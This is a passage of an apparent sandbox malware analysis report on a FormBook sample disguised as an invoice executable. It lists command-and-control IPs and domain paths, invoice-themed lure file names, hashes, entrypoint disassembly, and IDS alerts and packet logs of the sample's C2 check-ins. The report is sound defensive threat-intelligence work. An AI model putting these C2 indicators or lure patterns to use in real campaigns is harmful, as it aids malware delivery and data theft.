                                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target YVdkpeLSDe.exe, PID 5232 because it is empty
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              03:19:12API Interceptor1427930x Sleep call for process: fc.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              172.67.182.198CJE003889.exeGet hashmaliciousFormBookBrowse
                                              • www.grimbo.boats/mjln/
                                              199.192.21.169URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                              • www.technectar.top/ghvt/
                                              FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                              • www.technectar.top/ghvt/
                                              NU1aAbSmCr.exeGet hashmaliciousFormBookBrowse
                                              • www.tophm.xyz/30rz/
                                              lPX6PixV4t.exeGet hashmaliciousFormBookBrowse
                                              • www.zenscape.top/d8cw/
                                              Z6s208B9QX.exeGet hashmaliciousFormBookBrowse
                                              • www.zenscape.top/d8cw/
                                              8mmZ7Bkoj1.exeGet hashmaliciousFormBookBrowse
                                              • www.cenfresh.life/6iok/
                                              PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                              • www.selftip.top/85su/
                                              update SOA.exeGet hashmaliciousFormBookBrowse
                                              • www.technectar.top/ghvt/
                                              NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                              • www.selftip.top/85su/
                                              RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                                              • www.zenscape.top/d8cw/
                                              47.83.1.90SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                              • www.cruycq.info/lf6y/
                                              z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                              • www.gayhxi.info/jfb9/
                                              84.32.84.32z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                              • www.promocao.info/iiuy/
                                              profroma invoice.exeGet hashmaliciousFormBookBrowse
                                              • www.techmiseajour.net/jytl/
                                              ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                              • www.appsolucao.shop/qt4m/
                                              Payment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                              • www.thesnusgang.fun/z4qr/
                                              SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                              • www.activateya.life/f95q/
                                              ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                              • www.thesnusgang.fun/z4qr/
                                              DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                              • www.samundri.online/3ifu/
                                              purchase order.exeGet hashmaliciousFormBookBrowse
                                              • www.techmiseajour.net/jytl/
                                              SRT68.exeGet hashmaliciousFormBookBrowse
                                              • www.appsolucao.shop/qize/
                                              Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                              • www.sido247.pro/073p/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              www.grimbo.boatsCJE003889.exeGet hashmaliciousFormBookBrowse
                                              • 172.67.182.198
                                              www.gayhxi.infoz1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                              • 47.83.1.90

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              COMING-ASABCDEGROUPCOMPANYLIMITEDHKvcimanagement.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 156.241.105.229
                                              vcimanagement.armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 156.241.72.39
                                              vcimanagement.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 156.250.23.164
                                              vcimanagement.sh4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 156.224.192.71
                                              vcimanagement.m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 156.250.7.48
                                              vcimanagement.i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 156.250.23.181
                                              loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                              • 156.250.7.23
                                              loligang.arm.elfGet hashmaliciousMiraiBrowse
                                              • 154.212.186.183
                                              db0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 156.250.110.116
                                              xd.mips.elfGet hashmaliciousMiraiBrowse
                                              • 154.212.226.247
                                              VODANETInternationalIP-BackboneofVodafoneDEarmv5l.elfGet hashmaliciousUnknownBrowse
                                              • 2.206.129.205
                                              armv4l.elfGet hashmaliciousUnknownBrowse
                                              • 88.77.228.24
                                              armv6l.elfGet hashmaliciousUnknownBrowse
                                              • 88.73.45.174
                                              loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                              • 88.66.40.190
                                              kwari.mips.elfGet hashmaliciousUnknownBrowse
                                              • 92.79.235.220
                                              botx.x86.elfGet hashmaliciousMiraiBrowse
                                              • 178.12.160.225
                                              botx.m68k.elfGet hashmaliciousMiraiBrowse
                                              • 88.66.204.59
                                              loligang.spc.elfGet hashmaliciousMiraiBrowse
                                              • 47.80.88.42
                                              loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                              • 92.218.149.78
                                              x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 178.4.98.181
                                              CLOUDFLARENETUSdGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                              • 188.114.97.3
                                              dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                              • 188.114.97.3
                                              176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                              • 172.67.157.254
                                              CRf9KBk4ra.exeGet hashmaliciousDCRatBrowse
                                              • 172.67.19.24
                                              http://www.rr8844.comGet hashmaliciousUnknownBrowse
                                              • 188.114.96.3
                                              https://bitl.to/3Y0BGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                              • 104.17.208.240
                                              ETVk1yP43q.exeGet hashmaliciousAZORultBrowse
                                              • 104.21.79.229
                                              AimStar.exeGet hashmaliciousBlank GrabberBrowse
                                              • 162.159.128.233
                                              7FEGBYFBHFBJH32.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                              • 188.114.96.3
                                              16oApcahEa.exeGet hashmaliciousBabuk, DjvuBrowse
                                              • 104.21.32.1
                                              NAMECHEAP-NETUSloligang.mips.elfGet hashmaliciousMiraiBrowse
                                              • 37.61.233.171
                                              https://webmail.buzja.com/?auth=byoungjo.yoo@hyundaimovex.comGet hashmaliciousHTMLPhisherBrowse
                                              • 198.54.116.86
                                              SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                              • 162.0.236.169
                                              Laurier Partners Proposal.emlGet hashmaliciousHTMLPhisherBrowse
                                              • 199.188.207.168
                                              https://supercrete.lk/m/ms_doc.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 199.188.200.142
                                              http://jonotarmot.com/dcs/ms_doc.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 198.54.120.20
                                              cali.exeGet hashmaliciousAgentTeslaBrowse
                                              • 198.54.122.135
                                              https://towergroupofcompany.com/wp-includes/blobcit.htmlGet hashmaliciousHTMLPhisherBrowse
                                              • 63.250.38.156
                                              PO1341489LTB GROUP.vbsGet hashmaliciousFormBookBrowse
                                              • 199.193.6.134
                                              236236236.elfGet hashmaliciousUnknownBrowse
                                              • 104.219.248.76

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\17O3k-2I

                                              Download File
                                              Process:C:\Windows\SysWOW64\fc.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                              Category:dropped
                                              Size (bytes):196608
                                              Entropy (8bit):1.1239949490932863
                                              Encrypted:false
                                              SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                              MD5:271D5F995996735B01672CF227C81C17
                                              SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                              SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                              SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.964759159111111
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:inv#12180.exe
                                              File size:289'280 bytes
                                              MD5:cd504bdaa0159b25fdea4b248bb76fa8
                                              SHA1:27f9a4dd083d8058b54f3ad4f62ac29e33d95fcf
                                              SHA256:eca3e3a869dee81023d04034fdc14383bceb58d79aa4d5bc6b2f4378e4a01acb
                                              SHA512:fe2e646858ddc38cb921ef312d1538e3910d0277a3e2b3659ba2cd3a8dfb45be02378d4c697b5a41c026da520f57c251b70ff7954908b02b8bbce0f8da41a343
                                              SSDEEP:6144:q8ls/dPZs9JZY9iOKuxO9oTDFgxTFLVwkBDSiQ3ro:Y/dhQJqiOKsPDOZLGeDk3r
                                              TLSH:845422265F26B206C1FD2673351F4742B675472DBEA92F21B4992CB28D90CBE5EC03B1
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L......`.................X...................p....@................

                                              File Icon

                                              Icon Hash:00928e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x401580
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x60E3E289 [Tue Jul 6 04:56:41 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:6
                                              OS Version Minor:0
                                              File Version Major:6
                                              File Version Minor:0
                                              Subsystem Version Major:6
                                              Subsystem Version Minor:0
                                              Import Hash:

                                              Entrypoint Preview

                                              Instruction
                                              push ebp
                                              push esp
                                              pop ebp
                                              sub esp, 00000424h
                                              push ebx
                                              push esi
                                              push edi
                                              push 0000040Ch
                                              lea eax, dword ptr [ebp-00000420h]
                                              push 00000000h
                                              push eax
                                              mov dword ptr [ebp-00000424h], 00000000h
                                              call 00007FBF41328FECh
                                              add esp, 0Ch
                                              xor ecx, ecx
                                              sub edi, edi
                                              sub esi, esi
                                              mov dword ptr [ebp-14h], 00000054h
                                              mov dword ptr [ebp-10h], 00003B15h
                                              mov dword ptr [ebp-0Ch], 00001B0Dh
                                              mov dword ptr [ebp-08h], 00004BD2h
                                              pushad
                                              popad
                                              inc ecx
                                              mov eax, ecx
                                              and eax, 80000007h
                                              jns 00007FBF413273F7h
                                              dec eax
                                              or eax, FFFFFFF8h
                                              inc eax
                                              jne 00007FBF413273F4h
                                              add ecx, ecx
                                              cmp ecx, 00000CB4h
                                              jl 00007FBF413273D7h
                                              mov ecx, 00006ACDh
                                              mov eax, 92492493h
                                              imul ecx
                                              add edx, ecx
                                              sar edx, 05h
                                              push edx
                                              pop ecx
                                              shr ecx, 1Fh
                                              add ecx, edx
                                              jne 00007FBF413273DDh
                                              mov eax, 00001819h
                                              push 0000001Bh
                                              pop edx
                                              push ebx
                                              pop ebx
                                              mov ecx, 000000C2h
                                              cmp ecx, edx
                                              cmovl ecx, edx
                                              dec eax
                                              jne 00007FBF413273EAh
                                              mov ecx, 00001F5Ah
                                              mov eax, 82082083h
                                              imul ecx
                                              add edx, ecx
                                              sar edx, 06h
                                              mov ecx, edx
                                              shr ecx, 1Fh
                                              add ecx, edx
                                              jne 00007FBF413273DDh
                                              call 00007FBF4132924Ah
                                              mov dword ptr [ebp-5Ch], eax
                                              nop
                                              nop
                                              inc edi
                                              mov eax, 55555556h
                                              imul edi

                                              Rich Headers

                                              Programming Language:
                                              • [C++] VS2012 build 50727
                                              • [ASM] VS2012 build 50727
                                              • [LNK] VS2012 build 50727

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x456940x4580007a94fd1a0bc466060b127e8999e6f12False0.9886184802158273data7.9952540999254795IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2025-01-02T09:18:50.967762+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64998147.83.1.9080TCP
                                              2025-01-02T09:18:50.967762+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64998147.83.1.9080TCP
                                              2025-01-02T09:19:06.553230+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64998384.32.84.3280TCP
                                              2025-01-02T09:19:09.104885+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64998484.32.84.3280TCP
                                              2025-01-02T09:19:11.661370+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64998684.32.84.3280TCP
                                              2025-01-02T09:19:14.209016+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64998784.32.84.3280TCP
                                              2025-01-02T09:19:14.209016+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64998784.32.84.3280TCP
                                              2025-01-02T09:19:19.897883+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649988172.67.182.19880TCP
                                              2025-01-02T09:19:22.443510+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649989172.67.182.19880TCP
                                              2025-01-02T09:19:25.028001+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649990172.67.182.19880TCP
                                              2025-01-02T09:19:27.554714+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649991172.67.182.19880TCP
                                              2025-01-02T09:19:27.554714+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649991172.67.182.19880TCP
                                              2025-01-02T09:19:33.773711+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649992154.21.203.2480TCP
                                              2025-01-02T09:19:36.322319+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649993154.21.203.2480TCP
                                              2025-01-02T09:19:38.862961+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649994154.21.203.2480TCP
                                              2025-01-02T09:19:41.384718+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649995154.21.203.2480TCP
                                              2025-01-02T09:19:41.384718+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649995154.21.203.2480TCP
                                              2025-01-02T09:19:47.021501+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649997199.192.21.16980TCP
                                              2025-01-02T09:19:49.599573+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649998199.192.21.16980TCP
                                              2025-01-02T09:19:52.123868+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649999199.192.21.16980TCP
                                              2025-01-02T09:19:54.705543+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650000199.192.21.16980TCP
                                              2025-01-02T09:19:54.705543+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650000199.192.21.16980TCP
                                              2025-01-02T09:20:00.687438+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650001154.197.162.23980TCP
                                              2025-01-02T09:20:03.856960+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650002154.197.162.23980TCP
                                              2025-01-02T09:20:06.419000+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650003154.197.162.23980TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 2, 2025 09:18:49.361041069 CET4998180192.168.2.647.83.1.90
                                              Jan 2, 2025 09:18:49.365870953 CET804998147.83.1.90192.168.2.6
                                              Jan 2, 2025 09:18:49.365948915 CET4998180192.168.2.647.83.1.90
                                              Jan 2, 2025 09:18:49.375595093 CET4998180192.168.2.647.83.1.90
                                              Jan 2, 2025 09:18:49.380345106 CET804998147.83.1.90192.168.2.6
                                              Jan 2, 2025 09:18:50.967578888 CET804998147.83.1.90192.168.2.6
                                              Jan 2, 2025 09:18:50.967681885 CET804998147.83.1.90192.168.2.6
                                              Jan 2, 2025 09:18:50.967761993 CET4998180192.168.2.647.83.1.90
                                              Jan 2, 2025 09:18:50.988785028 CET4998180192.168.2.647.83.1.90
                                              Jan 2, 2025 09:18:50.993583918 CET804998147.83.1.90192.168.2.6
                                              Jan 2, 2025 09:19:06.092832088 CET4998380192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:06.097811937 CET804998384.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:06.097902060 CET4998380192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:06.112780094 CET4998380192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:06.117672920 CET804998384.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:06.553173065 CET804998384.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:06.553230047 CET4998380192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:07.623672962 CET4998380192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:07.630080938 CET804998384.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:08.642158031 CET4998480192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:08.647187948 CET804998484.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:08.647296906 CET4998480192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:08.661808968 CET4998480192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:08.666621923 CET804998484.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:09.104803085 CET804998484.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:09.104885101 CET4998480192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:10.170805931 CET4998480192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:10.175992012 CET804998484.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:11.189840078 CET4998680192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:11.194873095 CET804998684.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:11.194946051 CET4998680192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:11.209821939 CET4998680192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:11.214695930 CET804998684.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:11.214806080 CET804998684.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:11.659307957 CET804998684.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:11.661370039 CET4998680192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:12.717283964 CET4998680192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:12.722183943 CET804998684.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:13.736063957 CET4998780192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:13.740995884 CET804998784.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:13.741099119 CET4998780192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:13.750494003 CET4998780192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:13.755337954 CET804998784.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:14.208683968 CET804998784.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:14.208715916 CET804998784.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:14.208728075 CET804998784.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:14.208739996 CET804998784.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:14.208754063 CET804998784.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:14.208764076 CET804998784.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:14.208770990 CET804998784.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:14.208776951 CET804998784.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:14.208785057 CET804998784.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:14.208800077 CET804998784.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:14.209016085 CET4998780192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:14.213500977 CET4998780192.168.2.684.32.84.32
                                              Jan 2, 2025 09:19:14.218283892 CET804998784.32.84.32192.168.2.6
                                              Jan 2, 2025 09:19:19.235085964 CET4998880192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:19.239939928 CET8049988172.67.182.198192.168.2.6
                                              Jan 2, 2025 09:19:19.240048885 CET4998880192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:19.254493952 CET4998880192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:19.259403944 CET8049988172.67.182.198192.168.2.6
                                              Jan 2, 2025 09:19:19.896518946 CET8049988172.67.182.198192.168.2.6
                                              Jan 2, 2025 09:19:19.897828102 CET8049988172.67.182.198192.168.2.6
                                              Jan 2, 2025 09:19:19.897882938 CET4998880192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:20.764158964 CET4998880192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:21.782874107 CET4998980192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:21.787796974 CET8049989172.67.182.198192.168.2.6
                                              Jan 2, 2025 09:19:21.787900925 CET4998980192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:21.810206890 CET4998980192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:21.814997911 CET8049989172.67.182.198192.168.2.6
                                              Jan 2, 2025 09:19:22.442451000 CET8049989172.67.182.198192.168.2.6
                                              Jan 2, 2025 09:19:22.443331957 CET8049989172.67.182.198192.168.2.6
                                              Jan 2, 2025 09:19:22.443510056 CET4998980192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:23.326618910 CET4998980192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:24.345808029 CET4999080192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:24.350861073 CET8049990172.67.182.198192.168.2.6
                                              Jan 2, 2025 09:19:24.350943089 CET4999080192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:24.367449999 CET4999080192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:24.372355938 CET8049990172.67.182.198192.168.2.6
                                              Jan 2, 2025 09:19:24.372420073 CET8049990172.67.182.198192.168.2.6
                                              Jan 2, 2025 09:19:25.027806997 CET8049990172.67.182.198192.168.2.6
                                              Jan 2, 2025 09:19:25.027932882 CET8049990172.67.182.198192.168.2.6
                                              Jan 2, 2025 09:19:25.028001070 CET4999080192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:25.873534918 CET4999080192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:26.892132998 CET4999180192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:26.897064924 CET8049991172.67.182.198192.168.2.6
                                              Jan 2, 2025 09:19:26.897171021 CET4999180192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:26.905824900 CET4999180192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:26.910691977 CET8049991172.67.182.198192.168.2.6
                                              Jan 2, 2025 09:19:27.554383993 CET8049991172.67.182.198192.168.2.6
                                              Jan 2, 2025 09:19:27.554655075 CET8049991172.67.182.198192.168.2.6
                                              Jan 2, 2025 09:19:27.554713964 CET4999180192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:27.566715002 CET4999180192.168.2.6172.67.182.198
                                              Jan 2, 2025 09:19:27.571928978 CET8049991172.67.182.198192.168.2.6
                                              Jan 2, 2025 09:19:32.870038033 CET4999280192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:32.874947071 CET8049992154.21.203.24192.168.2.6
                                              Jan 2, 2025 09:19:32.875031948 CET4999280192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:32.889954090 CET4999280192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:32.894834995 CET8049992154.21.203.24192.168.2.6
                                              Jan 2, 2025 09:19:33.773566961 CET8049992154.21.203.24192.168.2.6
                                              Jan 2, 2025 09:19:33.773591995 CET8049992154.21.203.24192.168.2.6
                                              Jan 2, 2025 09:19:33.773710966 CET4999280192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:34.404849052 CET4999280192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:35.423768044 CET4999380192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:35.428796053 CET8049993154.21.203.24192.168.2.6
                                              Jan 2, 2025 09:19:35.428908110 CET4999380192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:35.446312904 CET4999380192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:35.451199055 CET8049993154.21.203.24192.168.2.6
                                              Jan 2, 2025 09:19:36.321973085 CET8049993154.21.203.24192.168.2.6
                                              Jan 2, 2025 09:19:36.322138071 CET8049993154.21.203.24192.168.2.6
                                              Jan 2, 2025 09:19:36.322319031 CET4999380192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:36.951694012 CET4999380192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:37.970453978 CET4999480192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:37.975941896 CET8049994154.21.203.24192.168.2.6
                                              Jan 2, 2025 09:19:37.976094007 CET4999480192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:37.990911007 CET4999480192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:37.995790005 CET8049994154.21.203.24192.168.2.6
                                              Jan 2, 2025 09:19:37.995866060 CET8049994154.21.203.24192.168.2.6
                                              Jan 2, 2025 09:19:38.862749100 CET8049994154.21.203.24192.168.2.6
                                              Jan 2, 2025 09:19:38.862895966 CET8049994154.21.203.24192.168.2.6
                                              Jan 2, 2025 09:19:38.862961054 CET4999480192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:39.498593092 CET4999480192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:40.518321037 CET4999580192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:40.523274899 CET8049995154.21.203.24192.168.2.6
                                              Jan 2, 2025 09:19:40.525336981 CET4999580192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:40.535661936 CET4999580192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:40.540529966 CET8049995154.21.203.24192.168.2.6
                                              Jan 2, 2025 09:19:41.384452105 CET8049995154.21.203.24192.168.2.6
                                              Jan 2, 2025 09:19:41.384531975 CET8049995154.21.203.24192.168.2.6
                                              Jan 2, 2025 09:19:41.384717941 CET4999580192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:41.387506962 CET4999580192.168.2.6154.21.203.24
                                              Jan 2, 2025 09:19:41.392261028 CET8049995154.21.203.24192.168.2.6
                                              Jan 2, 2025 09:19:46.409785986 CET4999780192.168.2.6199.192.21.169
